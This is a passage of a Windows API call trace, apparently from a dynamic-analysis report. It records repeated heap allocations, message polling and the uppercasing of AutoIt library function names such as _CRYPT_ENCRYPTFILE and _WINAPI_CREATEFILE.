hHeap=0xbe0000) returned 1 [0245.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xcfefd0 [0245.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9550 [0245.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9568 [0245.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5e50 [0245.409] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9568 | out: hHeap=0xbe0000) returned 1 [0245.410] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5e50 | out: hHeap=0xbe0000) returned 1 [0245.410] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.410] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xcea148 [0245.410] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9568 [0245.410] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5e50 [0245.410] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9568 | out: hHeap=0xbe0000) returned 1 [0245.410] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xcff008 [0245.410] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9568 [0245.410] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9580 [0245.410] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5e60 [0245.410] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9580 | out: hHeap=0xbe0000) returned 1 [0245.410] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5e60 | out: hHeap=0xbe0000) returned 1 [0245.410] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.410] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xcea170 [0245.410] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9580 [0245.410] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5e60 [0245.410] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9580 | out: hHeap=0xbe0000) returned 1 [0245.410] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xc1ae98 [0245.410] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9580 [0245.410] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9598 [0245.410] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5e70 [0245.410] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9598 | out: hHeap=0xbe0000) returned 1 [0245.410] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5e70 | out: hHeap=0xbe0000) returned 1 [0245.410] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.410] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xcea198 [0245.411] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9598 [0245.411] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5e70 [0245.411] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9598 | out: hHeap=0xbe0000) returned 1 [0245.411] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xc1aee0 [0245.411] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9598 [0245.411] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf95b0 [0245.411] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5e80 [0245.411] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf95b0 | out: hHeap=0xbe0000) returned 1 [0245.411] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5e80 | out: hHeap=0xbe0000) returned 1 [0245.411] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.411] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xcea1c0 [0245.411] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf95b0 [0245.411] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5e80 [0245.411] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf95b0 | out: hHeap=0xbe0000) returned 1 [0245.411] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xc1af28 [0245.411] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf95b0 [0245.411] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf95c8 [0245.411] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5e90 [0245.411] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf95c8 | out: hHeap=0xbe0000) returned 1 [0245.411] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5e90 | out: hHeap=0xbe0000) returned 1 [0245.411] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.411] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xcea1e8 [0245.411] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf95c8 [0245.411] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5e90 [0245.411] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf95c8 | out: hHeap=0xbe0000) returned 1 [0245.411] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xc1af70 [0245.412] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf95c8 [0245.412] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf95e0 [0245.412] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5ea0 [0245.412] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf95e0 | out: hHeap=0xbe0000) returned 1 [0245.412] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5ea0 | out: hHeap=0xbe0000) returned 1 [0245.412] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.412] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xcea210 [0245.412] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf95e0 [0245.412] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5ea0 [0245.412] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf95e0 | out: hHeap=0xbe0000) returned 1 [0245.412] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xcff040 [0245.412] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf95e0 [0245.412] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf95f8 [0245.412] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5eb0 [0245.412] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf95f8 | out: hHeap=0xbe0000) returned 1 [0245.412] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5eb0 | out: hHeap=0xbe0000) returned 1 [0245.412] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.412] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xcea238 [0245.412] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf95f8 [0245.412] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5eb0 [0245.412] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf95f8 | out: hHeap=0xbe0000) returned 1 [0245.412] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x50) returned 0xc63728 [0245.412] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf95f8 [0245.412] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9610 [0245.413] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5ec0 [0245.413] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9610 | out: hHeap=0xbe0000) returned 1 [0245.413] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5ec0 | out: hHeap=0xbe0000) returned 1 [0245.413] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.413] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xcea260 [0245.413] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9610 [0245.413] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5ec0 [0245.413] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9610 | out: hHeap=0xbe0000) returned 1 [0245.413] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xc1afb8 [0245.413] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9610 [0245.413] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9628 [0245.413] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5ed0 [0245.413] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9628 | out: hHeap=0xbe0000) returned 1 [0245.413] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5ed0 | out: hHeap=0xbe0000) returned 1 [0245.413] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.413] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xcea288 [0245.413] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9628 [0245.413] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.413] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.414] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.414] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.414] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.414] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.414] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0245.414] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcff120 | out: hHeap=0xbe0000) returned 1 [0245.414] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5f30 | out: hHeap=0xbe0000) returned 1 [0245.414] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.414] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0245.414] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcff120 | out: hHeap=0xbe0000) returned 1 [0245.414] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5f30 | out: hHeap=0xbe0000) returned 1 [0245.414] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.414] CharUpperBuffW (in: lpsz="_SENDMESSAGE", cchLength=0xc | out: lpsz="_SENDMESSAGE") returned 0xc [0245.414] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcea3c8 | out: hHeap=0xbe0000) returned 1 [0245.414] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5f30 | out: hHeap=0xbe0000) returned 1 [0245.414] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.414] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0245.415] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcff120 | out: hHeap=0xbe0000) returned 1 [0245.415] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5f30 | out: hHeap=0xbe0000) returned 1 [0245.415] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.415] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.415] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.415] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.415] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.415] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.415] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.415] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.415] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.415] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.416] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.416] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.416] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.416] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.416] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.416] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.416] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.416] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.416] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.416] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.416] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.416] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.417] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.417] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.417] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.417] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.417] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0245.417] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcff1c8 | out: hHeap=0xbe0000) returned 1 [0245.417] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21788 | out: hHeap=0xbe0000) returned 1 [0245.417] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.417] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0245.417] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcff1c8 | out: hHeap=0xbe0000) returned 1 [0245.417] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21788 | out: hHeap=0xbe0000) returned 1 [0245.417] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.417] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0245.418] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1dd30 | out: hHeap=0xbe0000) returned 1 [0245.418] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21788 | out: hHeap=0xbe0000) returned 1 [0245.418] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.418] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTFILE") returned 0x12 [0245.418] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcff1c8 | out: hHeap=0xbe0000) returned 1 [0245.418] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21788 | out: hHeap=0xbe0000) returned 1 [0245.418] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.418] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTDATA") returned 0x12 [0245.418] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcff1c8 | out: hHeap=0xbe0000) returned 1 [0245.418] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21788 | out: hHeap=0xbe0000) returned 1 [0245.418] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.418] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0245.418] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcff1c8 | out: hHeap=0xbe0000) returned 1 [0245.418] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21788 | out: hHeap=0xbe0000) returned 1 [0245.418] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.418] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0245.418] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcff1c8 | out: hHeap=0xbe0000) returned 1 [0245.418] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21788 | out: hHeap=0xbe0000) returned 1 [0245.418] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.419] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0245.419] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1b048 | out: hHeap=0xbe0000) returned 1 [0245.419] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21788 | out: hHeap=0xbe0000) returned 1 [0245.419] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.419] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0245.419] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1dd30 | out: hHeap=0xbe0000) returned 1 [0245.419] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21788 | out: hHeap=0xbe0000) returned 1 [0245.419] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.419] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0245.419] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcff1c8 | out: hHeap=0xbe0000) returned 1 [0245.419] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21788 | out: hHeap=0xbe0000) returned 1 [0245.419] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.419] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0245.419] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcff1c8 | out: hHeap=0xbe0000) returned 1 [0245.419] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21788 | out: hHeap=0xbe0000) returned 1 [0245.419] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.419] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0245.419] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcff1c8 | out: hHeap=0xbe0000) returned 1 [0245.419] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21788 | out: hHeap=0xbe0000) returned 1 [0245.419] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.420] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0245.420] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1dd30 | out: hHeap=0xbe0000) returned 1 [0245.420] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21788 | out: hHeap=0xbe0000) returned 1 [0245.420] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.420] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0245.420] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcff1c8 | out: hHeap=0xbe0000) returned 1 [0245.420] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21788 | out: hHeap=0xbe0000) returned 1 [0245.420] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.420] 